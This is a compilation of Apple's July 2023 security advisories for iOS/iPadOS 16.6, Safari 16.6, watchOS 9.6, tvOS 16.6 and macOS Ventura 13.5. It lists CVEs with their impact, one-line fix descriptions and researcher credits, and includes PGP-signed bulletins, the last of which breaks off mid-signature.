The issue was addressed with improvements to the file handling protocol. This issue is fixed in iOS 16.6 and iPadOS 16.6. An app may be able to break out of its sandbox.

Released July 24, 2023

**Apple Neural Engine**

Available for devices with Apple Neural Engine: iPhone 8 and later, iPad Pro (3rd generation) and later, iPad Air (3rd generation) and later, and iPad mini (5th generation)

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-38136: Mohamed GHANNAM (@\_simo36)

CVE-2023-38580: Mohamed GHANNAM (@\_simo36)

**Find My**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: A logic issue was addressed with improved restrictions.

CVE-2023-32416: Wojciech Regula of SecuRing (wojciechregula.blog)

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-32734: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

CVE-2023-32441: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs SG Pte. Ltd.

CVE-2023-38261: an anonymous researcher

CVE-2023-38424: Certik Skyfall Team

CVE-2023-38425: Certik Skyfall Team

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to modify sensitive kernel state. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1. 

Description: This issue was addressed with improved state management.

CVE-2023-38606: Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr\_), and Boris Larin (@oct0xor) of Kaspersky

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32381: an anonymous researcher

CVE-2023-32433: Zweig of Kunlun Lab

CVE-2023-35993: Kaitao Xie and Xiaolong Bai of Alibaba Group

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to elevate privileges

Description: The issue was addressed with improved checks.

CVE-2023-38410: an anonymous researcher

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote user may be able to cause a denial-of-service

Description: The issue was addressed with improved checks.

CVE-2023-38603: Zweig of Kunlun Lab

**libxpc**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to gain root privileges

Description: A path handling issue was addressed with improved validation.

CVE-2023-38565: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**libxpc**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause a denial-of-service

Description: A logic issue was addressed with improved checks.

CVE-2023-38593: Noah Roskin-Frazee

**NSURLSession**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improvements to the file handling protocol.

CVE-2023-32437: Thijs Alkemade from Computest Sector 7

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A website may be able to bypass Same Origin Policy

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma Soft Pvt. Ltd, Pune - India

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu

WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, and Jikai Ren

WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 259231  
CVE-2023-37450: an anonymous researcher

_This issue was first addressed in Rapid Security Response iOS 16.5.1 (c) and iPadOS 16.5.1 (c)._

**WebKit Process Model**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 258100  
CVE-2023-38597: 이준성(Junsung Lee) of Cross Republic

**WebKit Web Inspector**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing web content may disclose sensitive information

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

CVE-2023-32437: About the security content of iOS 16.6 and iPadOS 16.6

The issue was addressed with improved checks. This issue is fixed in iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5, Safari 16.6. Processing web content may lead to arbitrary code execution.

Released July 24, 2023

**WebKit**

Available for: macOS Big Sur and macOS Monterey

Impact: A website may be able to bypass Same Origin Policy

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma Soft Pvt. Ltd, Pune - India

**WebKit**

Available for: macOS Big Sur and macOS Monterey

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu

WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, and Jikai Ren

WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Big Sur and macOS Monterey

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

**WebKit Process Model**

Available for: macOS Big Sur and macOS Monterey

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 258100  
CVE-2023-38597: 이준성(Junsung Lee) of Cross Republic

**WebKit Web Inspector**

Available for: macOS Big Sur and macOS Monterey

Impact: Processing web content may disclose sensitive information

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

CVE-2023-38597: About the security content of Safari 16.6

This issue was addressed with improved state management. This issue is fixed in iOS 16.6 and iPadOS 16.6, macOS Big Sur 11.7.9, macOS Monterey 12.6.8, tvOS 16.6, watchOS 9.6, macOS Ventura 13.5, iOS 15.7.8 and iPadOS 15.7.8. An app may be able to modify sensitive kernel state. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1.

Released July 24, 2023

**Apple Neural Engine**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

 CVE-2023-38136: Mohamed GHANNAM (@\_simo36)

 CVE-2023-38580: Mohamed GHANNAM (@\_simo36)

**Find My**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to read sensitive location information

Description: A logic issue was addressed with improved restrictions.

CVE-2023-32416: Wojciech Regula of SecuRing (wojciechregula.blog)

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-32734: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

CVE-2023-32441: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs SG Pte. Ltd.

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-32381: an anonymous researcher

CVE-2023-32433: Zweig of Kunlun Lab

CVE-2023-35993: Kaitao Xie and Xiaolong Bai of Alibaba Group

**Kernel**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to modify sensitive kernel state. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1.

Description: This issue was addressed with improved state management.

CVE-2023-38606: Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr\_), and Boris Larin (@oct0xor) of Kaspersky

**libxpc**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to gain root privileges

Description: A path handling issue was addressed with improved validation.

CVE-2023-38565: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**libxpc**

Available for: Apple Watch Series 4 and later

Impact: An app may be able to cause a denial-of-service

Description: A logic issue was addressed with improved checks.

CVE-2023-38593: Noah Roskin-Frazee

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: A website may be able to bypass Same Origin Policy

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma Soft Pvt. Ltd, Pune - India

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu

WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, Jikai Ren

WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to arbitrary code execution

Description: The issue was addressed with improved memory handling.

WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

**WebKit**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 259231  
CVE-2023-37450: an anonymous researcher

**WebKit Web Inspector**

Available for: Apple Watch Series 4 and later

Impact: Processing web content may disclose sensitive information

Description: The issue was addressed with improved checks.

WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

CVE-2023-38606: About the security content of watchOS 9.6

Apple Security Advisory 2023-07-24-8 - watchOS 9.6 addresses bypass, code execution, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-07-24-8 watchOS 9.6

watchOS 9.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213848.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-38136: Mohamed GHANNAM (@_simo36)  
CVE-2023-38580: Mohamed GHANNAM (@_simo36)

Find My  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A logic issue was addressed with improved restrictions.  
CVE-2023-32416: Wojciech Regula of SecuRing (wojciechregula.blog)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-32734: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.  
CVE-2023-32441: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs SG  
Pte. Ltd.

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-32381: an anonymous researcher  
CVE-2023-32433: Zweig of Kunlun Lab  
CVE-2023-35993: Kaitao Xie and Xiaolong Bai of Alibaba Group

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to modify sensitive kernel state. Apple is  
aware of a report that this issue may have been actively exploited  
against versions of iOS released before iOS 15.7.1.  
Description: This issue was addressed with improved state management.  
CVE-2023-38606: Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin  
(@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of  
Kaspersky

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to gain root privileges  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2023-38565: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to cause a denial-of-service  
Description: A logic issue was addressed with improved checks.  
CVE-2023-38593: Noah Roskin-Frazee

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A website may be able to bypass Same Origin Policy  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma  
Soft Pvt. Ltd, Pune - India

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu  
WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, Jikai Ren  
WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution.  
Apple is aware of a report that this issue may have been actively  
exploited.  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 259231  
CVE-2023-37450: an anonymous researcher

WebKit Web Inspector  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmS/FLoACgkQ4RjMIDke  
NxmzaQ/8DN0im3Y0iJRoYgBwW5xNTUn6ewcO2BzHGWV/3vTWq6gip2V2cWCJ6lKS  
FTlP2n0+pRsk23WLWRJNzmAETVVB1UfVgzDvx9sc2aw07DpiCLVdoZr3wLxrKK3r  
67j2hTjRc8SDkjKrNCJKvjS0MO1FOje0FoCrtRP9inu32QTHXj7Rg/0iDqH+4tVS  
tbLxaomTMHjd8xL2X6nHCteofCx9nJvRKymlxJi7bCHQtHKyrAR3DnFjpG9Jxk38  
UeOTMwhmQN2r44e9CBj0vxf2WroYE0qiofXJP0x3zTQnS72z7BFfRf9kGnDGKGes  
GmQrh4+nG8tsr3Neo1rongITM7JYxl8uIuNxjNaRGjRpgb6RYk4TOgAhtTPv48NP  
QRbcq9opzVQcBU74/jGripIWxIDDuZaaLav6kxvAAJinCiaTmB9fE2ldDqxjEInS  
4N8F8JsONRrjeydOrhqC/9cDWeGpLUImv74qvLZmyaa2qmsyM6WWxY8mGxZL2oBN  
2xQUEr2BH53YgM0z3VnQhtnLImKA6ONZC6eNSgVcjJVU5Yp3fSRtvZsX8Y6ZDCzw  
R5KX0z6yrOmIpgdKI+Ejm59EIVFveVXflv6zZrfj7uoIZZ9mbv8iL0qzSDl+ExcB  
NkuagC5WyORhFPTdG1D3mNcBNiZhr+XLRQNoZhfd0KqEoeXphko=  
=SnKr  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-07-24-8

Apple Security Advisory 2023-07-24-7 - tvOS 16.6 addresses bypass, code execution, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-07-24-7 tvOS 16.6

tvOS 16.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213846.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-32734: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.  
CVE-2023-32441: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs SG  
Pte. Ltd.

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to modify sensitive kernel state. Apple is  
aware of a report that this issue may have been actively exploited  
against versions of iOS released before iOS 15.7.1.  
Description: This issue was addressed with improved state management.  
CVE-2023-38606: Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin  
(@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of  
Kaspersky

Kernel  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-32381: an anonymous researcher  
CVE-2023-32433: Zweig of Kunlun Lab  
CVE-2023-35993: Kaitao Xie and Xiaolong Bai of Alibaba Group

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: A website may be able to bypass Same Origin Policy  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma  
Soft Pvt. Ltd, Pune - India

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu  
WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, and Jikai Ren  
WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

WebKit  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing web content may lead to arbitrary code execution.  
Apple is aware of a report that this issue may have been actively  
exploited.  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 259231  
CVE-2023-37450: an anonymous researcher

WebKit Web Inspector  
Available for: Apple TV 4K (all models) and Apple TV HD  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmS/FLkACgkQ4RjMIDke  
Nxl5gRAA2z3qtF2NRTBpmW0GNmtwVB33PZUckSabe97M/lPYixnESGT30TbaQw8C  
u+aQrUoy5/WWJoXMGmIN6qVAstkWgXIbwV9oH113J5i2gHJrTDP0QPd2wUnd9jNz  
8mcjzlo52CE0h+ZzQqzsu/CItiTLpPQctoy8DAlx6GFibVikUTgXkOsEXw6iPPgQ  
c5ouEb9rSidOeYGjaRjXoDRtBT8FWxpC3bWietSxHcIVYq/ThMGcOMpzJiTBjjCV  
oiq8te/4G/YZgqhweMSuLh4eZWNP9mQOBrPd1h0DD5WtkqjGlMpMYE2CAIYGfaUR  
aWwxZV534ilZr1IzRSgmqt0d4C/7Jk69RsM6h3KhUSd87zMgNV6AS1khUEEzXNp5  
tGyw4EQ+FGr4hzJtYmVx+8g5kfH00JyrcAiuALj9lska4ZPWcz7WnS0+R4GsDaw6  
tjEeXa5VJJi5KnBDNhml0QXd99cADI/mqz5/LL+SLPNFn1/5k+A6Qbj19nbx9UBp  
oVfA0+LDHfUlt+pC75jwHqoV/4X/UOoAAER3yjkz4SNHCeqfD7ZzwhIg/x2+YcyS  
BRVdo+8xe4ckC2lkkt6Sa7EUt7G4nmIyE2RhPYxjVpUwbv7MzRSXFz0TX5p+vk4K  
pwNhnGty7Vc8FMhT1iH+MmpkgYiev5pAzAfw+oetoQQ3NElCCAs=  
=+SMD  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-07-24-7

Apple Security Advisory 2023-07-24-4 - macOS Ventura 13.5 addresses bypass, code execution, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-07-24-4 macOS Ventura 13.5

macOS Ventura 13.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213843.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Apple Neural Engine  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-38580: Mohamed GHANNAM (@_simo36)

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to determine a user’s current location  
Description: A downgrade issue affecting Intel-based Mac computers was  
addressed with additional code-signing restrictions.  
CVE-2023-36862: Mickey Jin (@patch1t)

AppSandbox  
Available for: macOS Ventura  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: A logic issue was addressed with improved restrictions.  
CVE-2023-32364: Gergely Kalman (@gergely_kalman)

Assets  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: This issue was addressed with improved data protection.  
CVE-2023-35983: Mickey Jin (@patch1t)

curl  
Available for: macOS Ventura  
Impact: Multiple issues in curl  
Description: Multiple issues were addressed by updating curl.  
CVE-2023-28319  
CVE-2023-28320  
CVE-2023-28321  
CVE-2023-28322

Find My  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: A logic issue was addressed with improved restrictions.  
CVE-2023-32416: Wojciech Regula of SecuRing (wojciechregula.blog)

Grapher  
Available for: macOS Ventura  
Impact: Processing a file may lead to unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved checks.  
CVE-2023-32418: Bool of YunShangHuaAn(云上华安)  
CVE-2023-36854: Bool of YunShangHuaAn(云上华安)

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-32734: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.  
CVE-2023-32441: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs SG  
Pte. Ltd.  
CVE-2023-38261: an anonymous researcher  
CVE-2023-38424: Certik Skyfall Team  
CVE-2023-38425: Certik Skyfall Team

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-32381: an anonymous researcher  
CVE-2023-32433: Zweig of Kunlun Lab  
CVE-2023-35993: Kaitao Xie and Xiaolong Bai of Alibaba Group

Kernel  
Available for: macOS Ventura  
Impact: A user may be able to elevate privileges  
Description: The issue was addressed with improved checks.  
CVE-2023-38410: an anonymous researcher

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to modify sensitive kernel state. Apple is  
aware of a report that this issue may have been actively exploited  
against versions of iOS released before iOS 15.7.1.  
Description: This issue was addressed with improved state management.  
CVE-2023-38606: Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin  
(@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of  
Kaspersky

Kernel  
Available for: macOS Ventura  
Impact: A remote user may be able to cause a denial-of-service  
Description: The issue was addressed with improved checks.  
CVE-2023-38603: Zweig of Kunlun Lab

libxpc  
Available for: macOS Ventura  
Impact: An app may be able to gain root privileges  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2023-38565: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxpc  
Available for: macOS Ventura  
Impact: An app may be able to cause a denial-of-service  
Description: A logic issue was addressed with improved checks.  
CVE-2023-38593: Noah Roskin-Frazee

Model I/O  
Available for: macOS Ventura  
Impact: Processing a 3D model may result in disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-38258: Mickey Jin (@patch1t)  
CVE-2023-38421: Mickey Jin (@patch1t)

OpenLDAP  
Available for: macOS Ventura  
Impact: A remote user may be able to cause a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-2953: Sandipan Roy

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: A logic issue was addressed with improved restrictions.  
CVE-2023-38259: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-38564: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file system  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-38602: Arsenii Kostromin (0x3c3e)

Shortcuts  
Available for: macOS Ventura  
Impact: A shortcut may be able to modify sensitive Shortcuts app  
settings  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2023-32442: an anonymous researcher

sips  
Available for: macOS Ventura  
Impact: Processing a file may lead to a denial-of-service or potentially  
disclose memory contents  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-32443: David Hoyt of Hoyt LLC

SystemMigration  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: The issue was addressed with improved checks.  
CVE-2023-32429: Wenchao Li and Xiaolong Bai of Hangzhou Orange Shield  
Information Technology Co., Ltd.

Voice Memos  
Available for: macOS Ventura  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with additional permissions checks.  
CVE-2023-38608: Yiğit Can YILMAZ (@yilmazcanyigit), Kirin (@Pwnrin), and  
Yishu Wang

WebKit  
Available for: macOS Ventura  
Impact: A website may be able to bypass Same Origin Policy  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256549  
CVE-2023-38572: Narendra Bhati (twitter.com/imnarendrabhati) of Suma  
Soft Pvt. Ltd, Pune - India

WebKit  
Available for: macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256865  
CVE-2023-38594: Yuhao Hu  
WebKit Bugzilla: 256573  
CVE-2023-38595: an anonymous researcher, Jiming Wang, Jikai Ren  
WebKit Bugzilla: 257387  
CVE-2023-38600: Anonymous working with Trend Micro Zero Day Initiative

WebKit  
Available for: macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 258058  
CVE-2023-38611: Francisco Alonso (@revskills)

WebKit  
Available for: macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution.  
Apple is aware of a report that this issue may have been actively  
exploited.  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 259231  
CVE-2023-37450: an anonymous researcher  
This issue was first addressed in Rapid Security Response macOS Ventura  
13.4.1 (c).

WebKit Process Model  
Available for: macOS Ventura  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 258100  
CVE-2023-38597: 이준성(Junsung Lee) of Cross Republic

WebKit Web Inspector  
Available for: macOS Ventura  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256932  
CVE-2023-38133: YeongHyeon Choi (@hyeon101010)

Additional recognition

WebRTC  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Ventura 13.5 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmS/FLcACgkQ4RjMIDke  
